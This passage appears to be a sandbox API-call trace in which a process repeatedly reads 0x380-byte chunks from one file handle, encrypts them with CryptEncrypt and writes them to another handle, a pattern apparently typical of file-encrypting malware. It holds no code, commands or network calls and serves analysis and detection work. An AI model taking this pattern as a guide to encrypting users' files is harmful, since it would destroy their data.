nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.610] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.610] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.610] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.612] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.612] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.612] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.612] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.612] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.613] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.614] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.614] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.615] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.615] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.616] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.616] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.616] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.616] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.616] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 